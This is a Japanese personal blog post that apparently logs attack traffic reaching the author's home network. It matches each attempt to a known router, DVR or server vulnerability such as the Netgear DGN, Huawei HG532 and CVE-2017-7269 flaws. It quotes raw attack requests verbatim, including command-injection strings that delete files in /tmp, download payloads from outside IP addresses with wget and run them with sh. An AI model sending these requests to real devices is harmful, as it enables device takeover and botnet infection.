tanakaのセキュリティブロク

セキュリティブログにしたい。

通信解析2

以下から変化した内容を。

taka-tana-sec.hatenablog.com

脆弱性検知

・Netbios null session

 

NetBIOS Enumeration And Null Sessionxtraweb.wordpress.com

・LinkSys E-series ルータの脆弱性

うちには"http://xxx//tmUnblock.cgi" のアクセスがきました。

That new Linksys worm... : netsec

 

Huawei Router HG532 - Arbitrary Command Execution

うちには”POST /ctrlt/DeviceUpgrade_1 HTTP/1.1”のアクセスがきました。

www.exploit-db.com

Netgear DGN の脆弱性

うちには

"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://68.183.28.29/cock+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"

こちらがきました。

Bugtraq: Unauthenticated command execution on Netgear DGN devices

 

・CVE-2017-5638  (これは中国から大量に)

www.morihi-soc.net

 

・CVE-2017-10271/CVE-2017-3506

ハニーポット観察記録(38)「WebLogic の WLS Security に対するコマンド実行の試み(CVE-2017-10271)」 at www.morihi-soc.net

 

github.com

 

・Multiple CCTV-DVR Vendors - Remote Code Execution

我が家にはこちらが。

GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://209.141.50.26/b;sh${IFS}/tmp/bm&>r&&tar${IFS}/string.js HTTP/1.0

www.exploit-db.com

www.paloaltonetworks.jp

 

・CVE-2017-7269  

うちにはこちらが。

PROPFIND / HTTP/1.1
Host: localhost
Connection: Close
Content-Length: 0
If: <http://localhost/aaaaaaa........................................................................................................................................................................................................................................................................................................................................................................................................................................> (Not <locktoken:write1>) <http://localhost/bbbbbbb.............................................................................................................................................................................................................................................................................................................................................................................................

blog.trendmicro.co.jp

 

続きは明日以降で。